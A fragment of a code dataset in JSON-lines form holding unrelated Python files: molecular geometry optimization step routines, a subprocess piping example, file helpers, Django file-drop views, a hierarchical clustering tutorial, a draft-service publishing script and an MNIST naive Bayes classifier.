? 
as for NR\n rfo_dqnorm = sqrt(np.dot(dq, dq))\n logger.info(\"\\tNorm of target step-size %15.10f\" % rfo_dqnorm)\n rfo_u = dq / rfo_dqnorm\n rfo_g = -1 * np.dot(fq, rfo_u)\n rfo_h = np.dot(rfo_u, np.dot(H, rfo_u))\n DEprojected = de_projected(\"RFO\", rfo_dqnorm, rfo_g, rfo_h)\n if op.Params.print_lvl > 1:\n logger.info(\"\\t|RFO target step| : %15.10f\" % rfo_dqnorm)\n logger.info(\"\\tRFO gradient : %15.10f\" % rfo_g)\n logger.info(\"\\tRFO hessian : %15.10f\" % rfo_h)\n logger.debug(\"\\tProjected Delta(E) : %15.10f\" % DEprojected)\n\n return DEprojected, dq, rfo_u, rfo_g, rfo_h\n\n\ndef dq_sd(fq):\n \"\"\"Take a step using steepest descent method\n\n Parameters\n ----------\n fq : ndarray\n forces in internal coordinates\n \"\"\"\n\n logger = logging.getLogger(__name__)\n logger.info(\"\\tTaking SD optimization step.\")\n dim = len(fq)\n sd_h = op.Params.sd_hessian # default value\n\n if len(oHistory.steps) > 1:\n previous_forces = oHistory.steps[-2].forces\n previous_dq = oHistory.steps[-2].Dq\n\n # Compute overlap of previous forces with current forces.\n previous_forces_u = previous_forces / np.linalg.norm(previous_forces)\n forces_u = fq / np.linalg.norm(fq)\n overlap = np.dot(previous_forces_u, forces_u)\n logger.debug(\"\\tOverlap of current forces with previous forces %8.4lf\" % overlap)\n previous_dq_norm = np.linalg.norm(previous_dq)\n\n if overlap > 0.50:\n # Magnitude of current force\n fq_norm = np.linalg.norm(fq)\n # Magnitude of previous force in step direction\n previous_forces_norm = v3d.dot(previous_forces, fq, dim) / fq_norm\n sd_h = (previous_forces_norm - fq_norm) / previous_dq_norm\n\n logger.info(\"\\tEstimate of Hessian along step: %10.5e\" % sd_h)\n dq = fq / sd_h\n\n apply_intrafrag_step_scaling(dq)\n\n sd_dqnorm = np.linalg.norm(dq)\n logger.info(\"\\tNorm of target step-size %10.5f\" % sd_dqnorm)\n\n # unit vector in step direction\n sd_u = dq / np.linalg.norm(dq)\n sd_g = -1.0 * sd_dqnorm\n\n DEprojected = de_projected(\"NR\", sd_dqnorm, sd_g, sd_h)\n logger.debug(\"\\tProjected energy change by quadratic approximation: %20.5lf\" % DEprojected)\n\n return DEprojected, dq, sd_u, sd_g, sd_h\n\n\ndef dq_backstep(o_molsys):\n \"\"\"takes a partial step backwards\n\n Notes\n -----\n Take partial backward step. 
Update current step in history.\n Divide the last step size by 1/2 and displace from old geometry.\n HISTORY contains:\n consecutiveBacksteps : increase by 1\n HISTORY.STEP contains:\n No change to these:\n forces, geom, E, followedUnitVector, oneDgradient, oneDhessian\n Update these:\n Dq - cut in half\n projectedDE - recompute\n\n \"\"\"\n\n logger = logging.getLogger(__name__)\n logger.warning(\"\\tRe-doing last optimization step - smaller this time.\\n\")\n\n # Calling function shouldn't let this happen; this is a check for developer\n if len(oHistory.steps) < 2:\n raise OptError(\"Backstep called, but no history is available.\")\n\n # Erase last, partial step data for current step.\n del oHistory.steps[-1]\n\n # Get data from previous step.\n fq = oHistory.steps[-1].forces\n dq = oHistory.steps[-1].Dq\n oneDgradient = oHistory.steps[-1].oneDgradient\n oneDhessian = oHistory.steps[-1].oneDhessian\n # Copy old geometry so displace doesn't change history\n geom = oHistory.steps[-1].geom.copy()\n\n # Compute new Dq and energy step projection.\n dq /= 2\n dqNorm = np.linalg.norm(dq)\n logger.info(\"\\tNorm of target step-size %10.5f\" % dqNorm)\n\n # Compute new Delta(E) projection.\n if op.Params.step_type == \"RFO\":\n DEprojected = de_projected(\"RFO\", dqNorm, oneDgradient, oneDhessian)\n else:\n DEprojected = de_projected(\"NR\", dqNorm, oneDgradient, oneDhessian)\n logger.debug(\"\\tProjected energy change : %20.5lf\" % DEprojected)\n\n o_molsys.geom = geom # uses setter; writes into all fragments\n dq_achieved = displace_molsys(o_molsys, dq, fq)\n\n dqNormActual = np.linalg.norm(dq_achieved)\n logger.info(\"\\tNorm of achieved step-size %15.10f\" % dqNormActual)\n\n oHistory.steps[-1].projectedDE = DEprojected\n oHistory.steps[-1].Dq[:] = dq_achieved\n\n return dq_achieved\n\n\ndef dq_linesearch(o_molsys, E, fq, H, computer):\n \"\"\"performs linesearch in direction of gradient\n\n Parameters\n ----------\n o_molsys : object\n optking molecular system\n E : double\n energy\n fq : ndarray\n forces in internal coordinates\n H : ndarray\n hessian in internal coordinates\n computer : computeWrapper\n \"\"\"\n\n logger = logging.getLogger(__name__)\n s = op.Params.linesearch_step\n\n if len(oHistory.steps) > 1:\n s = norm(oHistory.steps[-2].Dq) / 2\n logger.info(\"\\tModifying linesearch s to %10.6f\" % s)\n\n logger.info(\"\\n\\tTaking LINESEARCH optimization step.\")\n fq_unit = fq / sqrt(np.dot(fq, fq))\n logger.info(\"\\tUnit vector in gradient direction.\\n\\n\\t\" + print_array_string(fq_unit) + \"\\n\")\n Ea = E\n geomA = o_molsys.geom # get copy of original geometry\n Eb = Ec = 0\n bounded = False\n ls_iter = 0\n stepScale = 2\n\n # Iterate until we find 3 points bounding minimum.\n while ls_iter < 10 and not bounded:\n ls_iter += 1\n\n if Eb == 0:\n logger.debug(\"\\n\\tStepping along forces distance %10.5f\" % s)\n dq = s * fq_unit\n dq_achieved = displace_molsys(o_molsys, dq, fq)\n xyz = o_molsys.geom\n logger.debug(\"\\tComputing energy at this point now.\")\n Eb = computer.compute(xyz, driver=\"energy\", return_full=False)\n\n o_molsys.geom = geomA # reset geometry to point A\n\n if Ec == 0:\n logger.debug(\"\\n\\tStepping along forces distance %10.5f\" % (stepScale * s))\n dq = (stepScale * s) * fq_unit\n dq_achieved = displace_molsys(o_molsys, dq, fq)\n xyz = o_molsys.geom\n logger.debug(\"\\tComputing energy at this point now.\")\n Ec = computer.compute(xyz, driver=\"energy\", return_full=False)\n o_molsys.geom = geomA # reset geometry to point A\n\n 
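At this point dq_linesearch has energies at three step lengths; once the middle point is the lowest, the code below solves a 2x2 system for the parabola through (Sa, Ea), (Sb, Eb), (Sc, Ec) and jumps to its vertex. A self-contained sketch of the same fit, using np.polyfit as a stand-in for the hand-rolled solve, with toy numbers:

```python
import numpy as np

s = np.array([0.0, 0.4, 0.8])      # step lengths Sa, Sb, Sc
E = np.array([-1.0, -1.3, -1.1])   # energies Ea, Eb, Ec (middle one lowest)

a, b, c = np.polyfit(s, E, 2)      # E(s) ~= a*s**2 + b*s + c
s_min = -b / (2 * a)               # vertex of the parabola
print(s_min, a * s_min**2 + b * s_min + c)
```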
logger.info(\"\\n\\tCurrent linesearch bounds.\\n\")\n logger.info(\"\\t s=%7.5f, Ea=%17.12f\" % (0, Ea))\n logger.info(\"\\t s=%7.5f, Eb=%17.12f\" % (s, Eb))\n logger.info(\"\\t s=%7.5f, Ec=%17.12f\\n\" % (stepScale * s, Ec))\n\n if Eb < Ea and Eb < Ec:\n # second point is lowest do projection\n logger.debug(\"\\tMiddle point is lowest energy. Good. Projecting minimum.\")\n Sa = 0.0\n Sb = s\n Sc = stepScale * s\n\n A = np.zeros((2, 2))\n A[0, 0] = Sc * Sc - Sb * Sb\n A[0, 1] = Sc - Sb\n A[1, 0] = Sb * Sb - Sa * Sa\n A[1, 1] = Sb - Sa\n B = np.zeros(2)\n B[0] = Ec - Eb\n B[1] = Eb - Ea\n x = np.linalg.solve(A, B)\n Xmin = -x[1] / (2 * x[0])\n\n logger.debug(\"\\tParabolic fit ax^2 + bx + c along gradient.\")\n logger.debug(\"\\t *a = %15.10f\" % x[0])\n logger.debug(\"\\t *b = %15.10f\" % x[1])\n logger.debug(\"\\t *c = %15.10f\" % Ea)\n Emin_projected = x[0] * Xmin * Xmin + x[1] * Xmin + Ea\n dq = Xmin * fq_unit\n logger.info(\"\\tProjected step size to minimum is %12.6f\" % Xmin)\n dq_achieved = displace_molsys(o_molsys, dq, fq)\n xyz = o_molsys.geom\n logger.debug(\"\\tComputing energy at projected point.\")\n Emin = computer.compute(xyz, driver=\"energy\", return_full=False)\n logger.info(\"\\tProjected energy along line: %15.10f\" % Emin_projected)\n logger.info(\"\\t Actual energy along line: %15.10f\" % Emin)\n\n bounded = True\n\n elif Ec < Eb and Ec < Ea:\n # unbounded. increase step size\n logger.debug(\"\\tSearching with larger step beyond 3rd point.\")\n s *= stepScale\n Eb = Ec\n Ec = 0\n\n else:\n logger.debug(\"\\tSearching with smaller step between first 2 points.\")\n s *= 0.5\n Ec = Eb\n Eb = 0\n\n # get norm |q| and unit vector in the step direction\n ls_dqnorm = np.linalg.norm(dq_achieved)\n ls_u = dq_achieved / ls_dqnorm\n\n # get gradient and hessian in step direction\n ls_g = -1 * np.dot(fq, ls_u) # should be unchanged\n ls_h = np.dot(ls_u, np.dot(H, ls_u))\n\n if op.Params.print_lvl > 1:\n logger.info(\"\\n\\\\t|target step|: %15.10f\" % ls_dqnorm)\n logger.info(\"\\tLS_gradient : %15.10f\" % ls_g)\n logger.info(\"\\tLS_hessian : %15.10f\" % ls_h)\n\n DEprojected = de_projected(\"NR\", ls_dqnorm, ls_g, ls_h)\n logger.debug(\"\\tProjected quadratic energy change using full Hessian: %15.10f\\n\" % DEprojected)\n\n oHistory.nuclear_repulsion_energy = computer.trajectory[-1][\"properties\"][\"nuclear_repulsion_energy\"]\n\n return DEprojected, dq_achieved, ls_u, ls_g, ls_h\n\n # Scale fq into aJ for printing\n # fq_aJ = o_molsys.q_show_forces(fq)\n # displace_molsys(o_molsys, dq, fq_aJ)\n","sub_path":"optking/stepAlgorithms.py","file_name":"stepAlgorithms.py","file_ext":"py","file_size_in_byte":31594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"140001261","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n communicate() 方法读取所有输出,返回之前要等待子进程退出\n\n 下面的例子中,在程序运行时从 Popen 实例使用的各个管道句柄增量地进行读写\n\"\"\"\n\nimport io\nimport subprocess\n\nprint('One line at a time:')\n\nproc = subprocess.Popen(\n 'python3 repeater.py',\n shell=True,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n)\n\nstdin = io.TextIOWrapper(\n proc.stdin,\n encoding='utf-8',\n line_buffering=True, # send data on newline\n)\n\nstdout = io.TextIOWrapper(\n proc.stdout,\n encoding='utf-8',\n)\n\n# 写一行读一行\nfor i in range(5):\n line = '{}\\n'.format(i)\n stdin.write(line)\n output = stdout.readline()\n print(output.rstrip())\n\nremainder = proc.communicate()[0].decode('utf-8')\n\nprint()\n\nprint('remainder:', 
remainder)\n\nprint()\n\nprint('All output at once:')\n\nproc = subprocess.Popen(\n    'python3 repeater.py',\n    shell=True,\n    stdin=subprocess.PIPE,\n    stdout=subprocess.PIPE,\n)\n\nstdin = io.TextIOWrapper(\n    proc.stdin,\n    encoding='utf-8',\n)\n\n# Write all the lines first, then call communicate() once to read all of the output\nfor i in range(5):\n    line = '{}\\n'.format(i)\n    stdin.write(line)\nstdin.flush()\n\noutput = proc.communicate()[0].decode('utf-8')\n\nprint(output)\n\n# Result :\n\n# One line at a time:\n# repeater.py: starting\n# 0\n# 1\n# 2\n# 3\n# 4\n# repeater.py: exiting\n#\n# remainder:\n#\n# All output at once:\n# repeater.py: starting\n# repeater.py: exiting\n# 0\n# 1\n# 2\n# 3\n# 4\n","sub_path":"concurrent/subprocess/interact_with_another_command/interaction.py","file_name":"interaction.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"107775198","text":"from ex115 import *\n\n\ndef existearq(nome):\n    try:\n        a = open(nome, 'rt')\n        a.close()\n    except FileNotFoundError:\n        return False\n    else:\n        return True\n\n\ndef criararquivo(nome):\n    try:\n        a = open(nome, 'wt+')\n        a.close()\n    except:\n        print('Houve um erro na criação do arquivo!')\n    else:\n        print('Arquivo .txt criado com sucesso!')\n\n\ndef lerarquivo(nome):\n    try:\n        a = open(nome, 'rt')\n    except:\n        print('Erro ao tentar ler o arquivo')\n    else:\n        mensagem('Pessoas cadastradas')\n        for linha in a:\n            dado = linha.split(';')\n            dado[1] = dado[1].replace('\\n', '')\n            print(f'{dado[0]:<38}{dado[1]:>5} anos')\n        a.close()\n\n\ndef cadastrar(arq, nome='Desconhecido', idade=0):\n    try:\n        a = open(arq, 'at')\n    except:\n        print('Houve um erro na abertura do arquivo')\n    else:\n        try:\n            a.write(f'{nome};{idade}\\n')\n        except:\n            print('Houve um erro na escrita dos dados')\n        else:\n            print(f'Novo registro de {nome} adicionado')\n        a.close()","sub_path":"arquivo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"384494025","text":"from datetime import datetime,timedelta\n\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views import generic\nfrom django.http import HttpResponse, Http404\nfrom django.db.models import Q,F\nfrom ipware.ip import get_ip\n\nfrom filedrop.forms import DropFileForm\nfrom filedrop.models import DropFile\n\ndef get_fresh_drop_or_404(pk):\n    drop = get_object_or_404(DropFile, id=pk)\n    if drop.expire_time > 0:\n        td = timedelta(seconds = drop.expire_time)\n        if drop.created_at + td <= datetime.now(drop.created_at.tzinfo):\n            raise Http404\n    return drop\n\ndef index(request):\n    form = DropFileForm()\n    if request.method == 'POST':\n        form = DropFileForm(request.POST, request.FILES)\n        if form.is_valid():\n            drop = form.save(commit=False)\n            drop.uploaded_ip = get_ip(request)\n            drop.save()\n            return redirect(drop)\n    publicdrops = DropFile.objects.order_by('-created_at').filter(is_public=True).extra(where=['expire_time < 0 OR created_at + interval \\'1 second\\' * expire_time > now()'])\n    return render(request, 'filedrop/index.html',\n                  {\n                      'dropform': form,\n                      'publicdrops': publicdrops[:10]\n                  })\n\ndef drop_detail(request, pk):\n    drop = get_fresh_drop_or_404(pk=pk)\n    return render(request, 'filedrop/details.html',\n                  {\n                      'dropfile': drop\n                  
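The interaction example that closes above builds line-buffered text wrappers around the raw pipes by hand. On Python 3.7+ the same one-line-at-a-time exchange can be written with text=True and bufsize=1; this is an equivalent sketch, assuming the same repeater.py helper exists:

```python
import subprocess

proc = subprocess.Popen(
    ['python3', 'repeater.py'],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    text=True,       # pipes speak str instead of bytes
    bufsize=1,       # line-buffered: each written line is flushed
)
for i in range(5):
    proc.stdin.write('{}\n'.format(i))
    print(proc.stdout.readline().rstrip())
proc.communicate()   # drain any remaining output and wait for exit
```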
})\n","sub_path":"filedrop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"116317654","text":"#!/home/kevinml/anaconda3/bin/python3.7\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 27 13:15:02 2019\n\n@author: juangabriel and Kevin Meza\n\"\"\"\n\n# Hierarchical Clustering\n\n# =======================================================================================================\n# STEPS\n#\n# There are 2 types of hierarchical clustering: \"Agglomerative\" (bottom-up) and \"Divisive\" (top-down).\n#\n# Agglomerative Hierarchical Clustering\n# Joins the most similar elements one by one to form groups.\n#\n# STEPS\n# 1.- Make each point a cluster of its own.\n# 2.- Pick the 2 closest points and join them into a single cluster.\n# 3.- Pick the 2 closest clusters and join them into a single cluster.\n# 4.- Repeat step 3 until only one cluster remains.\n#\n# To decide which points or clusters are closest, Euclidean distance is generally used;\n# Manhattan distance, Minkowski distance, etc. can also be used.\n#\n# Distance between clusters\n# ###########################\n# OPTION 1: Computed from the closest points of the two clusters.\n# OPTION 2: Computed from the farthest points of the two clusters.\n# OPTION 3: The average distance is computed.\n#           All pairwise distances between the points of one cluster and the other are computed.\n# OPTION 4: The distance between the barycenters of the clusters is computed.\n#\n# The result is displayed visually with a DENDROGRAM.\n# Given the dendrogram, to obtain the number of clusters the data splits into, a Euclidean\n# distance threshold (representing dissimilarity) is chosen to cut the dendrogram.\n# The number of resulting clusters depends on the chosen threshold.\n#\n# Optimal number of clusters\n# ############################\n# One RULE is that the cut should cross the tallest vertical line of the dendrogram, which\n# represents the dissimilarity of one cluster with respect to the previous one, WITH THE\n# CONDITION that this vertical line does not cross any horizontal line.\n# The number of clusters is the number of vertical lines crossed by the horizontal cut.\n#\n# More dimensions\n# A dimensionality reduction technique must be applied first, and then the method.\n#\n# =======================================================================================================\n\n# Import the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n################################################\n###            IMPORT THE DATA SET            ###\n################################################\n\ndataset = pd.read_csv(\"Mall_Customers.csv\")\nX = dataset.iloc[:, [3, 4]].values\n\n#####################################################\n###         OPTIMAL NUMBER OF CLUSTERS           ###\n#####################################################\n\n# Use the dendrogram to find the optimal number of clusters\n\n# Import the library used to generate the dendrogram\nimport scipy.cluster.hierarchy as sch\n# The \"method\" parameter selects how clusters are merged;\n# the \"ward\" option minimizes the variance within each cluster.\ndendrogram = sch.dendrogram(sch.linkage(X, method=\"ward\"))\nplt.title(\"Dendrograma\")\nplt.xlabel(\"Clientes\")\nplt.ylabel(\"Distancia Euclídea\")\nplt.show()\n\n#################################################################\n#        FIT THE HIERARCHICAL CLUSTERING TO THE DATASET         #\n#################################################################\n\n# Import the library used to build the clusters.\n# https://scikit-learn.org/stable/modules/generated/sklearn.cluster.AgglomerativeClustering.html\nfrom sklearn.cluster import AgglomerativeClustering\n# The \"affinity\" parameter sets the distance metric to use.\n# The \"linkage\" parameter sets how clusters are merged. Since \"ward\" was used\n# for the dendrogram it is used here as well; other options are the minimum\n# or the average distance.\nhc = AgglomerativeClustering(\n    n_clusters=5, affinity=\"euclidean\", linkage=\"ward\")\ny_hc = hc.fit_predict(X)\n\n####################################\n#    Visualizing the clusters      #\n####################################\n\nplt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s=100, c=\"red\", label=\"Cautos\")\nplt.scatter(X[y_hc == 1, 0], X[y_hc == 1, 1],\n            s=100, c=\"blue\", label=\"Estandard\")\nplt.scatter(X[y_hc == 2, 0], X[y_hc == 2, 1],\n            s=100, c=\"green\", label=\"Objetivo\")\nplt.scatter(X[y_hc == 3, 0], X[y_hc == 3, 1],\n            s=100, c=\"cyan\", label=\"Descuidados\")\nplt.scatter(X[y_hc == 4, 0], X[y_hc == 4, 1], s=100,\n            c=\"magenta\", label=\"Conservadores\")\nplt.title(\"Cluster de clientes\")\nplt.xlabel(\"Ingresos anuales (en miles de $)\")\nplt.ylabel(\"Puntuación de Gastos (1-100)\")\nplt.legend()\nplt.show()\n","sub_path":"datasets/Part 4 - Clustering/Section 25 - Hierarchical Clustering/hc.py","file_name":"hc.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"614043805","text":"#!/usr/bin/env python\n\"\"\"\n\nFor a DOS-style framework (with no documents to migrate) this will:\n 1. Find all suppliers awarded onto the framework\n 2. Find all their submitted draft services on the framework\n 3. 
Migrate these from drafts to \"real\" services\n\nUsage:\n    scripts/publish-dos-draft-services.py <stage> <framework_slug> [--dry-run]\n\"\"\"\nimport sys\nsys.path.insert(0, '.')\n\nfrom docopt import docopt\nfrom dmscripts.helpers.auth_helpers import get_auth_token\nfrom dmscripts.helpers.framework_helpers import find_suppliers_on_framework, get_submitted_drafts\nfrom dmapiclient import DataAPIClient\nfrom dmutils.env_helpers import get_api_endpoint_from_stage\n\n\ndef make_draft_service_live(client, draft, dry_run):\n    print(u\"  > Migrating draft {} - {}\".format(draft['id'], draft['lot']))\n    if dry_run:\n        print(\"    > no-op\")\n    else:\n        try:\n            services = client.publish_draft_service(draft['id'], \"publish dos draft services script\")\n            service_id = services['services']['id']\n            print(u\"    > draft service published - new service ID {}\".format(service_id))\n        except Exception as e:\n            if str(e) == \"Cannot re-publish a submitted service\":\n                print(u\"    > Draft {} already published\".format(draft['id']))\n            else:\n                print(u\"    > ERROR MIGRATING DRAFT {} - {}\".format(draft['id'], str(e)))\n\n\nif __name__ == \"__main__\":\n    arguments = docopt(__doc__)\n\n    STAGE = arguments['<stage>']\n    DRY_RUN = arguments['--dry-run']\n    FRAMEWORK_SLUG = arguments['<framework_slug>']\n\n    api_url = get_api_endpoint_from_stage(STAGE)\n    client = DataAPIClient(api_url, get_auth_token('api', STAGE))\n\n    print(\"Finding suppliers...\")\n    suppliers = find_suppliers_on_framework(client, FRAMEWORK_SLUG)\n    print(\"Migrating drafts...\")\n    for supplier in suppliers:\n        print(u\"Migrating drafts for supplier {} - {}\".format(supplier['supplierId'], supplier['supplierName']))\n        draft_services = get_submitted_drafts(client, FRAMEWORK_SLUG, supplier['supplierId'])\n\n        for draft_service in draft_services:\n            make_draft_service_live(client, draft_service, DRY_RUN)\n","sub_path":"scripts/publish-dos-draft-services.py","file_name":"publish-dos-draft-services.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"56127983","text":"import copy\r\nimport time\r\nimport math\r\nimport struct\r\n\r\n\"\"\" \r\n\r\n    Pre-processing \r\n\r\n    The following code will process the MNIST training and label \r\n    files and store the data portioned into training, validation and\r\n    testing sets containing 60%, 20% and 20% of the MNIST data respectively\r\n\r\n\"\"\"\r\n\r\n\r\nclass MNIST_Processing():\r\n    # Initializing significant variables\r\n    MNIST_TRAIN_FILE = 'data/mnist-train'\r\n    MNIST_TRAIN_LABELS_FILE = 'data/mnist-train-labels'\r\n\r\n    TRAINING_PERCENTAGE = 60\r\n    VALIDATION_PERCENTAGE = 20\r\n    TESTING_PERCENTAGE = 20\r\n\r\n    training_list = []\r\n    validation_list = []\r\n    testing_list = []\r\n\r\n    training_labels = []\r\n    training_labels_vector = []\r\n    validation_labels = []\r\n    testing_labels = []\r\n\r\n    #\r\n    def __init__(self):\r\n        self.read_data()\r\n        self.read_labels()\r\n        self.adapt_labels()\r\n\r\n    def adapt_labels(self):\r\n        label_list = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n\r\n        for value in self.training_labels:\r\n            label_list[value] = 1\r\n\r\n            self.training_labels_vector.append(list(label_list))\r\n            label_list[value] = 0\r\n\r\n    # This retrieves and stores a list of vectors for the training, validation and testing list\r\n    def read_data(self):\r\n        image_file = open(self.MNIST_TRAIN_FILE, 'r+b')\r\n\r\n        # Locates the beginning of the file and retrieves the \"magic number\"\r\n        image_file.seek(0)\r\n\r\n        magic_number = image_file.read(4)\r\n        magic_number = struct.unpack('>i', 
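A quick way to sanity-check the docopt usage string restored above is to parse a sample argv and look at the resulting keys; the argument values here are invented:

```python
from docopt import docopt

usage = """Usage:
    publish-dos-draft-services.py <stage> <framework_slug> [--dry-run]
"""

args = docopt(usage, argv=['preview', 'digital-outcomes-and-specialists'])
print(args['<stage>'])           # -> preview
print(args['<framework_slug>'])  # -> digital-outcomes-and-specialists
print(args['--dry-run'])         # -> False
```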
magic_number)[0]\r\n\r\n # Records the number of images in the file\r\n num_images = image_file.read(4)\r\n num_images = struct.unpack('>i', num_images)[0]\r\n\r\n # Calculates requires size for the training, validation and testing data\r\n num_training = int(round((num_images * (self.TRAINING_PERCENTAGE / 100.0)), 0))\r\n num_validation = int(round((num_images * (self.VALIDATION_PERCENTAGE / 100.0)), 0))\r\n num_testing = int(round((num_images * (self.TESTING_PERCENTAGE / 100.0)), 0))\r\n\r\n print('Vectors in training: ' + str(num_training),\r\n '\\nVectors in validation: ' + str(num_validation),\r\n '\\nVectors in testing: ' + str(num_testing),\r\n '\\nTotal vectors: ' + str((num_training + num_validation + num_testing)),\r\n '\\n')\r\n\r\n # Records number of rows and columns\r\n rows = image_file.read(4)\r\n rows = struct.unpack('>i', rows)[0]\r\n\r\n columns = image_file.read(4)\r\n columns = struct.unpack('>i', columns)[0]\r\n\r\n # Initializes the training list\r\n print('Reading & parsing training data...')\r\n temp_training = image_file.read(rows * columns * num_training)\r\n self.training_list = self.normalizeFeatures(temp_training, rows, columns)\r\n\r\n print('Reading & parsing validation data...')\r\n temp_validation = image_file.read(rows * columns * num_validation)\r\n self.validation_list = self.normalizeFeatures(temp_validation, rows, columns)\r\n\r\n print('Reading & parsing testing data...\\n')\r\n temp_testing = image_file.read(rows * columns * num_testing)\r\n self.testing_list = self.normalizeFeatures(temp_testing, rows, columns)\r\n\r\n image_file.close()\r\n\r\n ### END OF read_data() ###\r\n\r\n #\r\n def read_labels(self):\r\n label_file = open(self.MNIST_TRAIN_LABELS_FILE, 'r+b')\r\n\r\n # Locates the beginning of the file and retrieves the \"magic number\"\r\n label_file.seek(0)\r\n\r\n magic_number = label_file.read(4)\r\n magic_number = struct.unpack('>i', magic_number)[0]\r\n\r\n # Records the number of labels in the file\r\n num_labels = label_file.read(4)\r\n num_labels = struct.unpack('>i', num_labels)[0]\r\n\r\n # Initializing the labels lists for the training, validation and testing data\r\n print('Reading & storing the labels...\\n')\r\n self.training_labels = list(label_file.read(len(self.training_list)))\r\n self.validation_labels = list(label_file.read(len(self.validation_list)))\r\n self.testing_labels = list(label_file.read(len(self.testing_list)))\r\n\r\n label_file.close()\r\n ### END OF read_labels() ###\r\n\r\n #\r\n\r\n # def normalize_features(self, feature, rows, columns):\r\n # feature = list(map(lambda x: 0 if x <100 else 1, feature))\r\n # return [feature[i: i + (rows * columns)] for i in range(0, len(feature), (rows * columns))]\r\n ### END OF normalize_featues() ###\r\n\r\n # Normalize features to a list\r\n def normalizeFeatures(self, feature, rows, columns, option='pixelsPerRow'):\r\n feature = list(map(lambda x: 0 if x < 10 else 1, feature)) # Normalize\r\n\r\n data = [feature[i:i + (rows * columns)] for i in range(0, len(feature), (rows * columns))]\r\n\r\n if (option == 'pixelsPerRow'):\r\n data = self.pixelsPerRowFeatExtraction(data)\r\n\r\n return data\r\n\r\n def pixelsPerRowFeatExtraction(self, data):\r\n totalData = []\r\n rowData = []\r\n row = 0\r\n for d in data:\r\n rowData = []\r\n for i in range(28):\r\n row = 0\r\n for j in range(28):\r\n if (d[i * 28 + j] == 1):\r\n row += 1\r\n rowData.append(row)\r\n totalData.append(rowData)\r\n return totalData\r\n\r\n\r\n\"\"\" END OF MNIST_Processing() CLASS \"\"\"\r\n\r\n\"\"\" 
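Naive Bayes classification\r\n\r\n    The following class trains a Naive Bayes digit classifier on the MNIST\r\n    data prepared above: per-class pixel probabilities are estimated with\r\n    add-one (Laplace) smoothing, and each vector is labelled with the class\r\n    whose log-posterior score is highest.\r\n\r\n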
\"\"\"\r\n\r\n\r\nclass MNIST_NaiveBayes():\r\n # Initializing significant variables\r\n class_prob = [0 for x in range(10)]\r\n pixel_prob = []\r\n\r\n training_list = []\r\n validation_list = []\r\n testing_list = []\r\n\r\n training_labels = []\r\n validation_labels = []\r\n testing_labels = []\r\n\r\n nb_training_labels = []\r\n nb_validation_labels = []\r\n nb_testing_labels = []\r\n\r\n collected_training_list = []\r\n collected_validation_list = []\r\n collected_testing_list = []\r\n\r\n #\r\n def __init__(self):\r\n # Initializes and prepares necessary components to run Bayes\r\n self.__initNB()\r\n start_train = time.process_time()\r\n self.train_bayes_v1()\r\n stop_train = time.process_time() - start_train\r\n\r\n self.display_stats()\r\n # The following runs the Bayes algoritm and records the predictions\r\n start_test = time.process_time()\r\n self.nb_training_labels = self.run_bayes(self.training_list)\r\n self.nb_validation_labels = self.run_bayes(self.validation_list)\r\n self.nb_testing_labels = self.run_bayes(self.testing_list)\r\n stop_test = time.process_time() - start_test\r\n\r\n # Displays accuracy results # Uncomment to display results\r\n self.test_accuracy('Training', self.nb_training_labels, self.training_labels)\r\n self.test_accuracy('Validation', self.nb_validation_labels, self.validation_labels)\r\n self.test_accuracy('Testing', self.nb_testing_labels, self.testing_labels)\r\n\r\n print('Training phase took: {0}'.format(stop_train))\r\n print('Testing phase took: {0}'.format(stop_test))\r\n # The following will display all vectors where the label matches the value passed\r\n # self.print_number(3)\r\n\r\n #\r\n def display_stats(self):\r\n if self.pixel_prob and self.class_prob:\r\n for index in range(len(self.class_prob)):\r\n print('Probability of class {0}: {1}'.format(index, self.class_prob[index]))\r\n\r\n print()\r\n\r\n \"\"\"\r\n for class_index in range(len(self.pixel_prob)):\r\n print('Class {0} contains the following pixel probability:'.format(class_index))\r\n\r\n output_string = ''\r\n\r\n for index in range(len(self.pixel_prob[class_index])):\r\n output_string += '{:.6f} '.format((self.pixel_prob[class_index][index] * 100))\r\n\r\n if index % 28 == 0:\r\n print(output_string)\r\n output_string = ''\r\n \"\"\"\r\n\r\n ### END OF display_stats() ###\r\n\r\n # The following will remove empty columns from each vector and tabulate\r\n # the different sizes generated. 
An empty column in this domain is\r\n # defined as a full column height of consecutive non-black pixels who belong to\r\n # a unique vertical line in the vector.\r\n ### NOTE: By design this method should be ran after collect_vector_height_data()\r\n ### method is ran at least once\r\n def collect_vector_width_data(self):\r\n if not self.collected_training_list or not self.collected_validation_list or not self.collected_testing_list:\r\n print('Missing data to process, now configuring...')\r\n self.collect_vector_height_data()\r\n\r\n #\r\n print('Processing vector width...')\r\n\r\n process_list = [self.collected_training_list, self.collected_validation_list, self.collected_testing_list]\r\n progress_index = 0\r\n\r\n for list in process_list:\r\n for vector in list:\r\n empty_column = True\r\n empty_index = []\r\n\r\n height = int(len(vector) / 28)\r\n\r\n new_vector = copy.deepcopy(vector)\r\n\r\n for x in range(28):\r\n for y in range(x, len(vector), 28):\r\n if new_vector[y] == 1:\r\n empty_column = False\r\n\r\n #\r\n if y > len(vector) - 28 and empty_column == True:\r\n empty_index.insert(0, x)\r\n elif y > len(vector) - 28 and empty_column == False:\r\n empty_column = True\r\n\r\n 